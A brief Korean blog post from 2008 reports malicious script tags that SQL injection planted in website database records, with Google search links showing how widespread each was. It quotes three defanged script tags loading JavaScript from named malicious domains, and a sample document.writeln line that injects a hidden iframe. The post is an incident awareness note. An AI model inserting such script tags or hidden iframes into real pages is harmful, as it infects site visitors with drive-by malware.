2008/05/08

Sql Injection 을 이용해 삽입된 최근 악성코드 몇개

다음은, 최근에 일부 사이트(직간접으로 운영되는 서버에서...)에서 발생했던 Sql Injection 을 이용한 레코드에 스크립트 삽입이 되었던 스크립트 들입니다.. 보니깐,. 5월 5일 어린이날 전후인듯 싶습니다. 

<script src="
hxxp://winzipices.cn/3.js"></script>

구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=winzipices.cn%2F3.js&btnG=%EA%B2%80%EC%83%89&lr=lang_ko&aq=-1&oq=

<script src="hxxp://www.11910.net/1.js"></script>

구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=11910.net%2F1.js&btnG=%EA%B2%80%EC%83%89&lr=lang_ko&aq=f

<script src=hxxp://www.nmidahena.com/1.js></script>

구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=nmidahena.com%2F1.js&lr=lang_ko&aq=f

이건,. 검색건수가 10,900 건이네요..


대부분 유사한 파일명인 1.js 로 구글에서 검색하면, 104,000 여개가 검색됩니다.

구글링: http://www.google.co.kr/search?complete=1&hl=ko&newwindow=1&q=1.js&btnG=%EA%B2%80%EC%83%89&lr=lang_ko&aq=f


위 js 파일들 내부는 거의 대부분, 아래와 같은 형식을 취하고 있습니다.

document.writeln("<iframe width=\'10\' height=\'1\' src=\'hxxp:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");

내용을 좀더 보실려면,.  저장하기 다운로드 받아서 텍스트 편집기로 열어보는 것도 좋겠습니다만,. 실행하면 안됩니다... -_-;;


댓글 없음:

댓글 쓰기

가장 많이 본 글